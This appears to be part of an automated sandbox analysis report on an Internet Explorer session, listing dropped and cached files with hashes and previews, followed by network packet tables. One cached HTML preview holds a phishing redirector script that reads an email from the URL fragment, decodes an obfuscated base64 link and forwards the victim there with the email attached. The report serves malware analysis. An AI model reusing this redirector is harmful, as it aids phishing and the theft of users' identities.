C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-4759708130\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	647
Entropy (8bit):	5.116706108533202
Encrypted:	false
SSDEEP:	12:TMHdNMNxiyUocUo1nWimI002EtM3MHdNMNxiyUocUo1nWimI00OYGd5EtMb:2d6Nx5MlSZHKd6Nx5MlSZ7YEjb
MD5:	C77C991D156CC2A46F95B6F31F3CA303
SHA1:	1D0A40A901BDBE0F3FA5AB09802FF770FAED3DE9
SHA-256:	51BEF898A6452C28E585AA77383C8C2A499DAAA431BB2A8F2A1F1F4DCB6803F8
SHA-512:	184C95E7EFBD4CA75C6F73266266DEFE9E31D90FDEF150574B317F4D0C15196AD9D5D1CFDEFC38525E00FB20AF125F0FEEFDF49A7EDCF7E8413930658B5870BD
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0x175d0658,0x01d745bd</date><accdate>0x175d0658,0x01d745bd</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0x175d0658,0x01d745bd</date><accdate>0x175d0658,0x01d745bd</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Live.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-6757900\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	656
Entropy (8bit):	5.174920781410274
Encrypted:	false
SSDEEP:	12:TMHdNMNxhGw/B1nWimI002EtM3MHdNMNxhGw/B1nWimI00OYG8K075EtMb:2d6NxQaSZHKd6NxQaSZ7YrKajb
MD5:	7E801643434BADB73C83C9E0DB08A5B8
SHA1:	8C4EE9A89F018C769F6B66A245106A9A16F69D50
SHA-256:	727983392410E825E888E2D93E2279C153586EFD9E191916A144A0430EBA6225
SHA-512:	3C9380CDA6BEE60B7C02E6F7FCDF17C3B435494544D579C2C322FB22EE32D736F5455C14C2F9E70BEBFFD82D5ABE6C073FAA122B17A103EAB76940CE4B26611F
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x17642d29,0x01d745bd</date><accdate>0x17642d29,0x01d745bd</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x17642d29,0x01d745bd</date><accdate>0x17642d29,0x01d745bd</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-8760897390\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	653
Entropy (8bit):	5.100252852896307
Encrypted:	false
SSDEEP:	12:TMHdNMNx0nyUocUo1nWimI002EtM3MHdNMNx0nyUocUo1nWimI00OYGxEtMb:2d6Nx0yMlSZHKd6Nx0yMlSZ7Ygb
MD5:	EA3A166516FACDFA1BA28CA0A4AE931D
SHA1:	E5C3750AFC416583C37F04342D58CBC0FA569A63
SHA-256:	88E804EC66B158D8677B2F6691124E761EDC6AB24AAF572567694A283AD3C512
SHA-512:	EB6916F28D2488CF93E5B86ABA61DC7D9C0DD7E4FF5752624B48E72E43107B8D329BBFD7A675341705AB9C1F834611E901A01DF94D0DC81CB6746D5ACE28C8D0
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0x175d0658,0x01d745bd</date><accdate>0x175d0658,0x01d745bd</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0x175d0658,0x01d745bd</date><accdate>0x175d0658,0x01d745bd</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Reddit.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20259167780\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	656
Entropy (8bit):	5.140779011911021
Encrypted:	false
SSDEEP:	12:TMHdNMNxxyUocUo1nWimI002EtM3MHdNMNxxyUocUo1nWimI00OYG6Kq5EtMb:2d6NxkMlSZHKd6NxkMlSZ7Yhb
MD5:	A8FCF34786F904335216860060B8F68C
SHA1:	55C71E977F1E1943D0268E8071A0065C8E29100D
SHA-256:	0ADCB146906D2D6F8E16B1DF264B013892DDB66DF113157654220AB23286CD0F
SHA-512:	A5C9E62DDD4170986FFF0F5B39F89DD6AEB3C8F100445AF578EBF813BAEABEFD19096B66C6B81778A5C5DB9358DAA223D4379E042F33BA986F3430BCAD6E642A
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0x175d0658,0x01d745bd</date><accdate>0x175d0658,0x01d745bd</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0x175d0658,0x01d745bd</date><accdate>0x175d0658,0x01d745bd</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\NYTimes.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20332743330\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	659
Entropy (8bit):	5.118711321703332
Encrypted:	false
SSDEEP:	12:TMHdNMNxcyUocUo1nWimI002EtM3MHdNMNxcyUocUo1nWimI00OYGVEtMb:2d6NxLMlSZHKd6NxLMlSZ7Ykb
MD5:	C5DE69FBD4C82F6BF42645C155E69CF4
SHA1:	41B25F0F4FBB219A79677D0A1C4EA0CC153C0B35
SHA-256:	6DBD0376C8371AFE3079FF5575E7A9EF2FC983D7B3E6C338165A2C907C6005C3
SHA-512:	721B417A2923459886030BC5C13A071C2738C625E931336116D7C7B8BEDDAECF9E4C94280AF00A0B69A09F13990F2D0A2A9037542C9C20F472CBE9125C2125FD
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x175d0658,0x01d745bd</date><accdate>0x175d0658,0x01d745bd</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x175d0658,0x01d745bd</date><accdate>0x175d0658,0x01d745bd</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin8215062560\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	653
Entropy (8bit):	5.101982120615673
Encrypted:	false
SSDEEP:	12:TMHdNMNxfnyUocUo1nWimI002EtM3MHdNMNxfnyUocUo1nWimI00OYGe5EtMb:2d6NxKMlSZHKd6NxKMlSZ7YLjb
MD5:	9B3400B58F1C4603EE7F4B73E5502D53
SHA1:	3BDD14BEE00BA1599A95DC10911921DEBFB9696C
SHA-256:	B2B80A349594382D82917E71585B215E8E79C585F5056FC10AACCE87A82FE816
SHA-512:	2C2B095B36614E7A4A8ABD745292B076CE2975928F4B3846650F19033751B10B500769B8923F0EA85AEA138EAFB1D57A137A8A2B050F972E23DE571768F3FBC5
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0x175d0658,0x01d745bd</date><accdate>0x175d0658,0x01d745bd</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0x175d0658,0x01d745bd</date><accdate>0x175d0658,0x01d745bd</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Google.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\imagestore\gee00pr\imagestore.dat Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	data
Category:	modified
Size (bytes):	972
Entropy (8bit):	7.422986792922402
Encrypted:	false
SSDEEP:	24:phYHrDl1KvB8VpaJI+e8HC2+6kIfDy1WjVf4MrQK:phYHrDp0JI+e2C2tFpjVf4Mp
MD5:	9C3E60FFCAB9D6F397259C24820C72C6
SHA1:	0B25CDA93091960C3C6686FAB0DA95E4ABCC961B
SHA-256:	EBF8DE519E0B20534386244D2E218C8E4ABA82F1B3D82A8360BA3B081343BCFC
SHA-512:	21847210524534B7AC0D990C1871B94CCB6098CF2D90EC017208B51B0654A386AEA606E6E4F80F5136E70EDC7857493DF42738506E8744F2B3327BB019034295
Malicious:	false
Reputation:	low
Preview:	.h.t.t.p.s.:././.s.t.o.r.a.g.e...g.o.o.g.l.e.a.p.i.s...c.o.m./.f.a.v.i.c.o.n...i.c.o.R....PNG........IHDR... ... .....szz.....IDATX...k.P..7......(..PDq.H.u.;/tu0a.Uq.1.u(6MZm..../.L.K....W..D.e....-].6m.&=.....I..;....<OrNz.a'}...vO........PmY..Q..@.@O.%"..8..x.=.,^D.FWy .'.B]..-D.W.ct.@%0{..M..c..z..te0@-.H.1..._.+..aa%!\I.iG..x.[....yP..\|....,....T.N'@5y7/...%..q...W;..X8f\|.e..M.W.T..T].G.$...?&.a~..n.U.80..o......#U....%QH.y..'....1..D..@!r.J.>..>..:._`$..&..S.....T.(.&@n...C[..<.....X.;...@.Z.B..lvE9..p.......C..w.yu.7.....*.1...M.d....88.0.ot$....P..h$......fCHZ&:..,.L..>...sE..:,.......'C.y..Gl...}......k......2..3.l..-.0f..^6.l....Q..1...G....2.7#...A.yR.'..c..G.g...R.n...$..N.C.u..\|....,..iH.,.&.<.:Z.AO.n()H.R..p&'.. ...._.z....ah=..c\|Z.)..e...LNu...4Y...qp..{...:.V...B..p..zh....k.....Y......B..h\|....o^...~4...z...w....4]...q...=.......}RO..N}.?P.k.....LC&....0....IEND.B`. ... ............e.`.....e.`....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\index[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, ASCII text, with CRLF line terminators
Category:	downloaded
Size (bytes):	1631
Entropy (8bit):	5.30538667804207
Encrypted:	false
SSDEEP:	48:lmIAqyU+YGZ/S9uWMWMUrZrZnI1CTlIyxplbp+f:1AbeNcalIyxjbq
MD5:	1E113662FAE39FA805200B1ADF738692
SHA1:	083859A2F711CCF823DFAE12C3FB30180135DEFC
SHA-256:	195CFCFD85AD2FFB5E155A80000D91797E23DDB02BBF3FB9FAD0D4D0FA7819E7
SHA-512:	A55AB65789652EAF6572E6E82C3A2950F01F0C6C303423789F36CD0E432F90754EC13BAF6149862566BDB3CE0493B9136DDCAB99804C4BEC494765D5C9E1B3C4
Malicious:	false
Reputation:	low
IE Cache URL:	https://storage.googleapis.com/shmxcpgboxsig1.appspot.com/index.html
Preview:	<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">..<head>.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>..</head>....<body>.. <h1>It Works!</h1> -->..<script type="text/javascript">.... if (window.location.hash){.... let arr = {.. 'email' : getProcessHash(),.. 'rand' : makeid(60).. };...... var link = window.atob('aHR0cHM6Ly9zaGFyZW15ZmlsZXN2aWV3c2lnNC56MTMud2ViLmNvcmUud2luZG93cy5uZXQ=');.. var hash = btoa(JSON.stringify(arr));.. // var mal = btoa(getProcessHash());.. //var hashe = getdirecthash();.. // console.log(`${link}#${mal}`).. window.top.location.href=`${link}#${hash}`;.... }.... function getProcessHash(){.. if(window.location.hash){.. let h = window.location.hash;.. let s = h.split('#')[1];.. // let arr = JSON.parse(atob(s));.. return window.atob(s);.. }.. }....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\cloud_storage-32[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	850
Entropy (8bit):	7.680885612757513
Encrypted:	false
SSDEEP:	24:+l1KvB8VpaJI+e8HC2+6kIfDy1WjVf4MrQ1:+p0JI+e2C2tFpjVf4M+
MD5:	352549ECE32E8183CB6792D5B1E7450B
SHA1:	6C6EA952EC11C2026E828F0118BB9A58E35CCFBF
SHA-256:	24283ABECAB24B0A7F50518EF5E9C684B1ABD4FDBB31C6D0E1CA63A236A34D1C
SHA-512:	5CC8C80095B2928EEAEAA987FEE7769FC344A913F89D4505F38687D87916351DABEA19883550FFE4B95B2E2802FEE7297A9927C845F78DD5AA963BFF06AE7EED
Malicious:	false
Reputation:	low
IE Cache URL:	https://www.google.com/images/icons/product/cloud_storage-32.png
Preview:	.PNG........IHDR... ... .....szz.....IDATX...k.P..7......(..PDq.H.u.;/tu0a.Uq.1.u(6MZm..../.L.K....W..D.e....-].6m.&=.....I..;....<OrNz.a'}...vO........PmY..Q..@.@O.%"..8..x.=.,^D.FWy .'.B]..-D.W.ct.@%0{..M..c..z..te0@-.H.1..._.+..aa%!\I.iG..x.[....yP..\|....,....T.N'@5y7/...%..q...W;..X8f\|.e..M.W.T..T].G.$...?&.a~..n.U.80..o......#U....%QH.y..'....1..D..@!r.J.>..>..:._`$..&..S.....T.(.&@n...C[..<.....X.;...@.Z.B..lvE9..p.......C..w.yu.7......1...M.d....88.0.ot$....P..h$......fCHZ&:..,.L..>...sE..:,.......'C.y..Gl...}......k......2..3.l..-.0f..^6.l....Q..1...G....2.7#...A.yR.'..c..G.g...R.n...$..N.C.u..\|....,..iH.,.&.<.:Z.AO.n()H.R..p&'.. ...._.z....ah=..c\|Z.)..e...LNu...4Y...qp..{...:.V...B..p..zh....k.....Y......B..h\|....o^...~4...z...w....4]...q...=.......}RO..N}.?P.k.....LC&....0....IEND.B`.

C:\Users\user\AppData\Local\Temp\~DF1C043692063288D4.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	25441
Entropy (8bit):	0.3184216860082344
Encrypted:	false
SSDEEP:	24:c9lLh9lLh9lIn9lIn9lRx/9lRJ9lTb9lTb9lSSU9lSSU9laAa/9laAwjlaA:kBqoxxJhHWSVSEabY
MD5:	B4778CAA402BF9710DC50C4300BAAC1B
SHA1:	B2389EEF32EEEC7A7A3CB6AFC8BF9BB10CB57C4C
SHA-256:	BB956028F4ADCE3DA7F2355F33BC14109B5578AE14DDCEF43391B4FA072DF612
SHA-512:	AC1FBA8A8E664B70C389A5DCFA5600C980417E026E8394C9771A95F64939B454A312E6EA01CD2A503189FFAA386E2B4ACBB06933871D923A5D5B3C0A29C18912
Malicious:	false
Reputation:	low
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF5AB5BBEAE3F7FB34.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	13029
Entropy (8bit):	0.4743127881156571
Encrypted:	false
SSDEEP:	24:c9lLh9lLh9lIn9lIn9lo3y9lo3i9lW3UOMeX/XZcX:kBqoItrEOMeX/XZcX
MD5:	D75E7BC7F722BA77E4A4AB6B455392A2
SHA1:	F014A2201AE4326EEA3E726FB67350D4274C0473
SHA-256:	ECB12E7B4411B1FFF2C116C298C69188BA19E1C84AA8F46CF9075808C4A116E9
SHA-512:	DB69FC8C80C5185159E50A9333A9010EF2263766FA8983D84E1B09FAC811C03979D66C2F3313867F8215BE7F044E7111C4BC8957045686B701C0B446B4F19342
Malicious:	false
Reputation:	low
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFB7AD7B8ED78B5551.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	34573
Entropy (8bit):	0.3878040541798696
Encrypted:	false
SSDEEP:	48:kBqoxKAuvScS++c+6+g+B+tI+tDYtBhYH69h8G:kBqoxKAuvScS++c+6+g+B+q+lYtQs8G
MD5:	8730A9E45662ADB57E11AA129573DD8D
SHA1:	7128E5A8C1E8F0EE66E82CC8BA5AD970F08299E4
SHA-256:	B04CEFB3F4D5DD638403436B55F5ACEA1B81ECA78EB2C67E0B095998A95CD206
SHA-512:	94AA39120350B3F002D76919A5CBA9EDE498E6FC1D272BF9255D1303C8DD4589FC00D8C123E5DAFB2DD83C2DDCAADD57DC8907BB6A5F2E6989BC8E01FF07364F
Malicious:	false
Reputation:	low
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

No static file info

Network Behavior

Download Network PCAP: filtered – full

Network Port Distribution

Total Packets: 91
• 443 (HTTPS)
• 80 (HTTP)
• 53 (DNS)

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 10, 2021 18:53:35.208069086 CEST	49724	80	192.168.2.4	18.198.163.56
May 10, 2021 18:53:35.209287882 CEST	49725	80	192.168.2.4	18.198.163.56
May 10, 2021 18:53:35.250354052 CEST	80	49724	18.198.163.56	192.168.2.4
May 10, 2021 18:53:35.250503063 CEST	49724	80	192.168.2.4	18.198.163.56
May 10, 2021 18:53:35.251573086 CEST	49724	80	192.168.2.4	18.198.163.56
May 10, 2021 18:53:35.251847029 CEST	80	49725	18.198.163.56	192.168.2.4
May 10, 2021 18:53:35.251914978 CEST	49725	80	192.168.2.4	18.198.163.56
May 10, 2021 18:53:35.293235064 CEST	80	49724	18.198.163.56	192.168.2.4
May 10, 2021 18:53:35.302500010 CEST	80	49724	18.198.163.56	192.168.2.4
May 10, 2021 18:53:35.302634001 CEST	49724	80	192.168.2.4	18.198.163.56
May 10, 2021 18:53:35.373944998 CEST	49726	443	192.168.2.4	23.227.38.32
May 10, 2021 18:53:35.373990059 CEST	49727	443	192.168.2.4	23.227.38.32
May 10, 2021 18:53:35.416225910 CEST	443	49727	23.227.38.32	192.168.2.4
May 10, 2021 18:53:35.416335106 CEST	49727	443	192.168.2.4	23.227.38.32
May 10, 2021 18:53:35.416455984 CEST	443	49726	23.227.38.32	192.168.2.4
May 10, 2021 18:53:35.416532993 CEST	49726	443	192.168.2.4	23.227.38.32
May 10, 2021 18:53:35.424007893 CEST	49727	443	192.168.2.4	23.227.38.32
May 10, 2021 18:53:35.424453974 CEST	49726	443	192.168.2.4	23.227.38.32
May 10, 2021 18:53:35.464839935 CEST	443	49727	23.227.38.32	192.168.2.4
May 10, 2021 18:53:35.465476990 CEST	443	49726	23.227.38.32	192.168.2.4
May 10, 2021 18:53:35.469091892 CEST	443	49727	23.227.38.32	192.168.2.4
May 10, 2021 18:53:35.469118118 CEST	443	49727	23.227.38.32	192.168.2.4
May 10, 2021 18:53:35.469130039 CEST	443	49727	23.227.38.32	192.168.2.4
May 10, 2021 18:53:35.469227076 CEST	49727	443	192.168.2.4	23.227.38.32
May 10, 2021 18:53:35.469291925 CEST	49727	443	192.168.2.4	23.227.38.32
May 10, 2021 18:53:35.475544930 CEST	443	49726	23.227.38.32	192.168.2.4
May 10, 2021 18:53:35.475578070 CEST	443	49726	23.227.38.32	192.168.2.4
May 10, 2021 18:53:35.475590944 CEST	443	49726	23.227.38.32	192.168.2.4
May 10, 2021 18:53:35.475614071 CEST	49726	443	192.168.2.4	23.227.38.32
May 10, 2021 18:53:35.475645065 CEST	49726	443	192.168.2.4	23.227.38.32
May 10, 2021 18:53:35.510205030 CEST	49726	443	192.168.2.4	23.227.38.32
May 10, 2021 18:53:35.510829926 CEST	49727	443	192.168.2.4	23.227.38.32
May 10, 2021 18:53:35.518074989 CEST	49727	443	192.168.2.4	23.227.38.32
May 10, 2021 18:53:35.518253088 CEST	49726	443	192.168.2.4	23.227.38.32
May 10, 2021 18:53:35.518395901 CEST	49727	443	192.168.2.4	23.227.38.32
May 10, 2021 18:53:35.551192045 CEST	443	49726	23.227.38.32	192.168.2.4
May 10, 2021 18:53:35.551501989 CEST	443	49726	23.227.38.32	192.168.2.4
May 10, 2021 18:53:35.551522970 CEST	443	49726	23.227.38.32	192.168.2.4
May 10, 2021 18:53:35.551537037 CEST	443	49727	23.227.38.32	192.168.2.4
May 10, 2021 18:53:35.551585913 CEST	49726	443	192.168.2.4	23.227.38.32
May 10, 2021 18:53:35.551615000 CEST	49726	443	192.168.2.4	23.227.38.32
May 10, 2021 18:53:35.552176952 CEST	443	49727	23.227.38.32	192.168.2.4
May 10, 2021 18:53:35.552321911 CEST	443	49727	23.227.38.32	192.168.2.4
May 10, 2021 18:53:35.552654028 CEST	49726	443	192.168.2.4	23.227.38.32
May 10, 2021 18:53:35.553436995 CEST	49727	443	192.168.2.4	23.227.38.32
May 10, 2021 18:53:35.553495884 CEST	49727	443	192.168.2.4	23.227.38.32
May 10, 2021 18:53:35.553502083 CEST	49727	443	192.168.2.4	23.227.38.32
May 10, 2021 18:53:35.558799028 CEST	443	49727	23.227.38.32	192.168.2.4
May 10, 2021 18:53:35.558844090 CEST	443	49727	23.227.38.32	192.168.2.4
May 10, 2021 18:53:35.558939934 CEST	49727	443	192.168.2.4	23.227.38.32
May 10, 2021 18:53:35.559084892 CEST	443	49726	23.227.38.32	192.168.2.4
May 10, 2021 18:53:35.559101105 CEST	443	49726	23.227.38.32	192.168.2.4
May 10, 2021 18:53:35.559803963 CEST	49726	443	192.168.2.4	23.227.38.32
May 10, 2021 18:53:35.594181061 CEST	443	49727	23.227.38.32	192.168.2.4
May 10, 2021 18:53:35.636379957 CEST	443	49726	23.227.38.32	192.168.2.4
May 10, 2021 18:53:35.636683941 CEST	443	49727	23.227.38.32	192.168.2.4
May 10, 2021 18:53:35.938091040 CEST	443	49727	23.227.38.32	192.168.2.4
May 10, 2021 18:53:35.938199997 CEST	49727	443	192.168.2.4	23.227.38.32
May 10, 2021 18:53:36.015543938 CEST	49729	443	192.168.2.4	100.24.77.241
May 10, 2021 18:53:36.015933037 CEST	49730	443	192.168.2.4	100.24.77.241
May 10, 2021 18:53:36.159013987 CEST	443	49729	100.24.77.241	192.168.2.4
May 10, 2021 18:53:36.159086943 CEST	443	49730	100.24.77.241	192.168.2.4
May 10, 2021 18:53:36.159205914 CEST	49729	443	192.168.2.4	100.24.77.241
May 10, 2021 18:53:36.159249067 CEST	49730	443	192.168.2.4	100.24.77.241
May 10, 2021 18:53:36.192445993 CEST	49729	443	192.168.2.4	100.24.77.241
May 10, 2021 18:53:36.193191051 CEST	49730	443	192.168.2.4	100.24.77.241
May 10, 2021 18:53:36.338004112 CEST	443	49729	100.24.77.241	192.168.2.4
May 10, 2021 18:53:36.338306904 CEST	443	49730	100.24.77.241	192.168.2.4
May 10, 2021 18:53:36.339915991 CEST	443	49730	100.24.77.241	192.168.2.4
May 10, 2021 18:53:36.339939117 CEST	443	49730	100.24.77.241	192.168.2.4
May 10, 2021 18:53:36.339962006 CEST	443	49730	100.24.77.241	192.168.2.4
May 10, 2021 18:53:36.339982986 CEST	443	49730	100.24.77.241	192.168.2.4
May 10, 2021 18:53:36.339984894 CEST	49730	443	192.168.2.4	100.24.77.241
May 10, 2021 18:53:36.340020895 CEST	49730	443	192.168.2.4	100.24.77.241
May 10, 2021 18:53:36.340043068 CEST	49730	443	192.168.2.4	100.24.77.241
May 10, 2021 18:53:36.340365887 CEST	443	49729	100.24.77.241	192.168.2.4
May 10, 2021 18:53:36.340390921 CEST	443	49729	100.24.77.241	192.168.2.4
May 10, 2021 18:53:36.340413094 CEST	443	49729	100.24.77.241	192.168.2.4
May 10, 2021 18:53:36.340435028 CEST	443	49729	100.24.77.241	192.168.2.4
May 10, 2021 18:53:36.340436935 CEST	49729	443	192.168.2.4	100.24.77.241
May 10, 2021 18:53:36.340465069 CEST	49729	443	192.168.2.4	100.24.77.241
May 10, 2021 18:53:36.340570927 CEST	49729	443	192.168.2.4	100.24.77.241
May 10, 2021 18:53:36.358463049 CEST	49730	443	192.168.2.4	100.24.77.241
May 10, 2021 18:53:36.359036922 CEST	49730	443	192.168.2.4	100.24.77.241
May 10, 2021 18:53:36.359344006 CEST	49730	443	192.168.2.4	100.24.77.241
May 10, 2021 18:53:36.364366055 CEST	49729	443	192.168.2.4	100.24.77.241
May 10, 2021 18:53:36.364922047 CEST	49729	443	192.168.2.4	100.24.77.241
May 10, 2021 18:53:36.502994061 CEST	443	49730	100.24.77.241	192.168.2.4
May 10, 2021 18:53:36.503024101 CEST	443	49730	100.24.77.241	192.168.2.4
May 10, 2021 18:53:36.503179073 CEST	49730	443	192.168.2.4	100.24.77.241
May 10, 2021 18:53:36.503218889 CEST	49730	443	192.168.2.4	100.24.77.241
May 10, 2021 18:53:36.503314972 CEST	443	49730	100.24.77.241	192.168.2.4
May 10, 2021 18:53:36.503361940 CEST	49730	443	192.168.2.4	100.24.77.241
May 10, 2021 18:53:36.510118008 CEST	443	49729	100.24.77.241	192.168.2.4
May 10, 2021 18:53:36.510149002 CEST	443	49729	100.24.77.241	192.168.2.4
May 10, 2021 18:53:36.510261059 CEST	49729	443	192.168.2.4	100.24.77.241
May 10, 2021 18:53:36.510334969 CEST	443	49729	100.24.77.241	192.168.2.4
May 10, 2021 18:53:36.510377884 CEST	49729	443	192.168.2.4	100.24.77.241
May 10, 2021 18:53:36.512232065 CEST	443	49730	100.24.77.241	192.168.2.4
May 10, 2021 18:53:36.512321949 CEST	49730	443	192.168.2.4	100.24.77.241
May 10, 2021 18:53:36.585840940 CEST	49730	443	192.168.2.4	100.24.77.241
May 10, 2021 18:53:36.586937904 CEST	49729	443	192.168.2.4	100.24.77.241
May 10, 2021 18:53:36.769895077 CEST	443	49730	100.24.77.241	192.168.2.4
May 10, 2021 18:53:36.774382114 CEST	443	49729	100.24.77.241	192.168.2.4
May 10, 2021 18:53:45.281322002 CEST	80	49725	18.198.163.56	192.168.2.4
May 10, 2021 18:53:45.281430006 CEST	49725	80	192.168.2.4	18.198.163.56
May 10, 2021 18:53:45.289896965 CEST	80	49724	18.198.163.56	192.168.2.4
May 10, 2021 18:53:45.290030003 CEST	49724	80	192.168.2.4	18.198.163.56

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 10, 2021 18:53:26.410408020 CEST	61516	53	192.168.2.4	8.8.8.8
May 10, 2021 18:53:26.460525036 CEST	53	61516	8.8.8.8	192.168.2.4
May 10, 2021 18:53:27.180805922 CEST	49182	53	192.168.2.4	8.8.8.8
May 10, 2021 18:53:27.229449987 CEST	53	49182	8.8.8.8	192.168.2.4
May 10, 2021 18:53:27.952747107 CEST	59920	53	192.168.2.4	8.8.8.8
May 10, 2021 18:53:28.001496077 CEST	53	59920	8.8.8.8	192.168.2.4
May 10, 2021 18:53:28.727221966 CEST	57458	53	192.168.2.4	8.8.8.8
May 10, 2021 18:53:28.784590960 CEST	53	57458	8.8.8.8	192.168.2.4
May 10, 2021 18:53:30.614238024 CEST	50579	53	192.168.2.4	8.8.8.8
May 10, 2021 18:53:30.665175915 CEST	53	50579	8.8.8.8	192.168.2.4
May 10, 2021 18:53:31.501723051 CEST	51703	53	192.168.2.4	8.8.8.8
May 10, 2021 18:53:31.558706999 CEST	53	51703	8.8.8.8	192.168.2.4
May 10, 2021 18:53:32.480349064 CEST	65248	53	192.168.2.4	8.8.8.8
May 10, 2021 18:53:32.531969070 CEST	53	65248	8.8.8.8	192.168.2.4
May 10, 2021 18:53:33.516330004 CEST	53723	53	192.168.2.4	8.8.8.8
May 10, 2021 18:53:33.568041086 CEST	53	53723	8.8.8.8	192.168.2.4
May 10, 2021 18:53:33.931243896 CEST	64646	53	192.168.2.4	8.8.8.8
May 10, 2021 18:53:33.995810032 CEST	53	64646	8.8.8.8	192.168.2.4
